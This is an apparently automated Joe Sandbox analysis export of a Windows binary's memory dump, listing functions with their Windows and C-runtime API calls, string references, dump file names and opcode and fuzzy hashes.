Opcode ID: d72d8173033cb09c37da75eb78a95cf91b32a95add117bb8070b4d6bdd94767b
Instruction ID: 6391c2f71201945b2327666c6f9712f871c14ec481b36ec80670bfc85c3ec831
Opcode Fuzzy Hash: d72d8173033cb09c37da75eb78a95cf91b32a95add117bb8070b4d6bdd94767b
Instruction Fuzzy Hash: FF51F1B19043009BD702AF24DCC5B2FB7E9FF88344F154A2DF4899B251E734D9448752

Function 0034375A Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034384A

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 95e708f98e352d988744a148c4b39d184aac210fcaafb13d5bf5575842058d65
Instruction ID: 7a9d823f42a28687bba70c4d099d0ce5dfc8ccaced0def9fc1d1400c876ef318
Opcode Fuzzy Hash: 95e708f98e352d988744a148c4b39d184aac210fcaafb13d5bf5575842058d65
Instruction Fuzzy Hash: 3971D1B19051696EDF22AF68CC8DBBABBF8EF05300F1441DAE0499B251DB356F858F10

Function 00335020 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0033502C
IsDebuggerPresent.KERNEL32 ref: 003350F8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00335111
UnhandledExceptionFilter.KERNEL32(?), ref: 0033511B

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 17daa074bf46731d6ac28134a1bb9ba83d2408f6309d5166b0de5edc03350b11
Instruction ID: 636bb8f79a09921e7fe6b2adf43999b880af472314639bca5086842764a831e9
Opcode Fuzzy Hash: 17daa074bf46731d6ac28134a1bb9ba83d2408f6309d5166b0de5edc03350b11
Instruction Fuzzy Hash: 54310AB5D053199BDF22DF64DD897CDBBB8AF08300F1041AAE40DAB250EB719B858F45

Function 0033123B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85encryptionCOMMON

Download Yara Rule

APIs

CryptContextAddRef.ADVAPI32(00000000,00000000,00000000), ref: 003312C7

Strings

[+], xrefs: 003312E1

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ContextCrypt
String ID: [+]
API String ID: 3075001677-4228040803
Opcode ID: 8969c6317cd71645401bd306019cd2c92d263eec6b1c3b1635951d44a48f8a15
Instruction ID: a20e516cb6cae4faa6fadfd2449bea0bb9716dc07962e03462675f9676428fb2
Opcode Fuzzy Hash: 8969c6317cd71645401bd306019cd2c92d263eec6b1c3b1635951d44a48f8a15
Instruction Fuzzy Hash: A231F73550C3804BD717AB34A8D97EBBBD4ABBE318F19097DD8C9C7243D2A15449CB62

Function 0034A222 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,0034A20D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0034A2C8
__alloca_probe_16.LIBCMT ref: 0034A383
__alloca_probe_16.LIBCMT ref: 0034A412
__freea.LIBCMT ref: 0034A45D
__freea.LIBCMT ref: 0034A463
__freea.LIBCMT ref: 0034A499
__freea.LIBCMT ref: 0034A49F
__freea.LIBCMT ref: 0034A4AF

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 89dfba7ac1d0dc66af4554857689ca06dd70097fbc84477bb7a7c6c08776b435
Instruction ID: 1b669aae874db035082a594098e0e14e9c944b3aebe5aa88a4c3b07b1216b2c9
Opcode Fuzzy Hash: 89dfba7ac1d0dc66af4554857689ca06dd70097fbc84477bb7a7c6c08776b435
Instruction Fuzzy Hash: DC710972940A059BDF239F95CC86BAE7BFA9F45310F254055F904AF381E775EC008762

Function 003354C5 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0033550C
__alloca_probe_16.LIBCMT ref: 00335538
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00335577
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00335594
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003355D3
__alloca_probe_16.LIBCMT ref: 003355F0
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00335632
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00335655

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 5151f64e3ed573a0f67f596ea9cc73f31b557ce2dec3e60eefb33283fdec0be5
Instruction ID: abfa828a17a3ed6c2dc31e98d8c080111afcd108d7bb9616df99bbcef8d84323
Opcode Fuzzy Hash: 5151f64e3ed573a0f67f596ea9cc73f31b557ce2dec3e60eefb33283fdec0be5
Instruction Fuzzy Hash: 1051A072600606AFEF229F65CC86FBB7BA9EF40751F564425FD05EA1A0DB30DD108B90

Function 003361E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00336217
___except_validate_context_record.LIBVCRUNTIME ref: 0033621F
_ValidateLocalCookies.LIBCMT ref: 003362A8
__IsNonwritableInCurrentImage.LIBCMT ref: 003362D3
_ValidateLocalCookies.LIBCMT ref: 00336328

Strings

csm, xrefs: 003362BD

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 2b9f9002a7ea33bdb3bf2997852a297b11b48f8f6039071976e94ddaf8feb0a7
Instruction ID: 492a90b17d630f87328ddbe71ff0b32f88068b793d3a1000196be56b45017db4
Opcode Fuzzy Hash: 2b9f9002a7ea33bdb3bf2997852a297b11b48f8f6039071976e94ddaf8feb0a7
Instruction Fuzzy Hash: B3418234A00218AFCF12DF68C8C6A9EBBB5EF45324F15C555E8149F3A2D771AA05CB91

Function 0033F469 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,0033F578,0033186A,?,00000000,003331E1,0033186C,?,0033F1F6,00000022,FlsSetValue,0034DFE0,8,5,003331E1), ref: 0033F52A

Strings

ext-ms-, xrefs: 0033F4D4
api-ms-, xrefs: 0033F4C0

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 066424019a4ae8340af20a1f66eaa4e13afafdfb11067ab9da81d44504a86887
Instruction ID: e1b959f2cc2acb5b0f5f4b34274bd437abd872c1cfbe8009d5e8bbd4da27567b
Opcode Fuzzy Hash: 066424019a4ae8340af20a1f66eaa4e13afafdfb11067ab9da81d44504a86887
Instruction Fuzzy Hash: A1219372E02311AFDB239B65EC85A5B775C9B427A5F650130FD16AB2A0EB30FE00C6D0

Function 0034625D Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f860e3d02eb0dfb5b8e39e9fc1b85d506612de9670ea47cbf934196d7d472022
Instruction ID: 53dd24b1b9f93867f9708bb4d28659b0ae23d703fc99c2689e0d0c38ff3bf35a
Opcode Fuzzy Hash: f860e3d02eb0dfb5b8e39e9fc1b85d506612de9670ea47cbf934196d7d472022
Instruction Fuzzy Hash: A7B11370A04344AFDF13DFA9D892BADBBF8AF46300F154199E5019F3A6C770A941CB62

Function 0033D2C0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0033D2B7,00335FB7,00335179), ref: 0033D2CE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0033D2DC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0033D2F5
SetLastError.KERNEL32(00000000,0033D2B7,00335FB7,00335179), ref: 0033D347

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e28ec3d1ea4337ece4867767ace7a3d3dcda7d6dccd51a40e47616f87b9f1a2c
Instruction ID: 186b87cd0697e6b1b16b52b73caf29cc05af0c13c614d9aec36e534be79e2a01
Opcode Fuzzy Hash: e28ec3d1ea4337ece4867767ace7a3d3dcda7d6dccd51a40e47616f87b9f1a2c
Instruction Fuzzy Hash: 7D01F23620F7259EE7272B74BCC596B2A9CEB017B6F240329F120A90F0EF15BC4492C1

Function 0033DB88 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0033DCA7
CallUnexpected.LIBVCRUNTIME ref: 0033DF20

Strings

csm, xrefs: 0033DBC5
csm, xrefs: 0033DC32
csm, xrefs: 0033DCDE

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 1dc41d27470410209cc3a0b2dbf2cbe885760f6c5b61698639a442d10c0721c1
Instruction ID: a6e533bf1190751298d5eda33410eb8d3eca719147cf8e1f8006d7c6fd1b58f6
Opcode Fuzzy Hash: 1dc41d27470410209cc3a0b2dbf2cbe885760f6c5b61698639a442d10c0721c1
Instruction Fuzzy Hash: 61B16971800209EFCF2ADFA4E8C19AEBBB5FF14310F15455AE811AF216D771EA61CB91

Function 0033457B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00334582
std::_Lockit::_Lockit.LIBCPMT ref: 0033458C

Part of subcall function 003324C2: std::_Lockit::_Lockit.LIBCPMT ref: 003324DE
Part of subcall function 003324C2: std::_Lockit::~_Lockit.LIBCPMT ref: 003324F7

codecvt.LIBCPMT ref: 003345C6
std::_Lockit::~_Lockit.LIBCPMT ref: 003345FD

Strings

hf5, xrefs: 00334597

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID: hf5
API String ID: 3716348337-3700509576
Opcode ID: 679212265b0f81e3c6584279bfab36ffe19e452300f9c3b3da9cd787ddf47b3f
Instruction ID: 4d60e1b9acd9c8826087f85ae69875ecba73944f3398a063c8a195f0ff47a95b
Opcode Fuzzy Hash: 679212265b0f81e3c6584279bfab36ffe19e452300f9c3b3da9cd787ddf47b3f
Instruction Fuzzy Hash: 6101F575900615CBCF07EFA4D8966AEB7B5FF55710F250508F411AF2A1CF74AE018791

Function 00338C55 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338C8A
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338C9C
FreeLibrary.KERNEL32(00000000,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338CBE

Strings

CorExitProcess, xrefs: 00338C94
mscoree.dll, xrefs: 00338C83

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a2ebc0f2816eacbf2e43fb1f545e91f16c651129f6f63ac7fa625f05a2a249f4
Instruction ID: 7f3b41f7e9c422655e46988e701db1a244716b9d93048e04aa8ef38f9b0fc4db
Opcode Fuzzy Hash: a2ebc0f2816eacbf2e43fb1f545e91f16c651129f6f63ac7fa625f05a2a249f4
Instruction Fuzzy Hash: 86016771945755EFDB138B54CC49FEEBBBCFB44B52F000525F811A22E0DB749900CA90

Function 0033FC3D Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0033FCC2
__alloca_probe_16.LIBCMT ref: 0033FD8B
__freea.LIBCMT ref: 0033FDF2

Part of subcall function 0033E531: HeapAlloc.KERNEL32(00000000,003331E1,0033186A,?,003360C1,0033186C,0033186A,?,?,?,00333181,003331E1,0033186E,0033186A,0033186A,0033186A), ref: 0033E563

__freea.LIBCMT ref: 0033FE05
__freea.LIBCMT ref: 0033FE12

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 8f74603fb210a249694235cb8867d9ca75d15cdafba1e40b8c59f2f2777e8703
Instruction ID: 25080428a21125f59c424ce893c6e0a5bc69529afb6788eddbd93dac9b15c2cc
Opcode Fuzzy Hash: 8f74603fb210a249694235cb8867d9ca75d15cdafba1e40b8c59f2f2777e8703
Instruction Fuzzy Hash: E451A672900246AFEF22AF62DCC5EBB7AADEF44710F960539FD04DA151EB34DC5096A0

Function 00333010 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00333017
std::_Lockit::_Lockit.LIBCPMT ref: 00333022
std::_Lockit::~_Lockit.LIBCPMT ref: 00333090

Part of subcall function 00332EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00332EFC

std::locale::_Setgloballocale.LIBCPMT ref: 0033303D
_Yarn.LIBCPMT ref: 00333053

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 2062838bad451c5e0d9b5c7bf8e62c44c656eca0a02e36797728c0d1e9e94f13
Instruction ID: 01f33944cef2dc9be6af8024aa5c5565985df18ff89244a889aed25ca3591d7a
Opcode Fuzzy Hash: 2062838bad451c5e0d9b5c7bf8e62c44c656eca0a02e36797728c0d1e9e94f13
Instruction Fuzzy Hash: 66018FB6A002249BCB0BEF60D88697D7B75FF85341F154409E8125B3A1DF34AE42CB81

Function 00347E92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00347F2E,00000000,?,00356E10,?,?,?,00347E65,00000004,InitializeCriticalSectionEx,0034E57C,0034E584), ref: 00347E9F
GetLastError.KERNEL32(?,00347F2E,00000000,?,00356E10,?,?,?,00347E65,00000004,InitializeCriticalSectionEx,0034E57C,0034E584,00000000,?,0033E1DC), ref: 00347EA9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00347ED1

Strings

api-ms-, xrefs: 00347EB6

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 3d0dd7108fbec4753c5da21c2366a16f5d270be1a17453f333e4f18fe46ec239
Instruction ID: 987a0315bf1dc2fd44ee6a9f40c565b39edb45184c46b2b5de10bc2f7845544a
Opcode Fuzzy Hash: 3d0dd7108fbec4753c5da21c2366a16f5d270be1a17453f333e4f18fe46ec239
Instruction Fuzzy Hash: A1E04870284309B7DB131B61DC06F593B9DDB10B91F104060FE0DBC4F1D761AD9096C4

Function 0034562D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00345690

Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003458E2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00345928
GetLastError.KERNEL32 ref: 003459CB

Memory Dump Source

Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 4b5be69ff0b3e373e4b68c35f79950b107c921f51e07b63bd0e6d15e764e9b8a
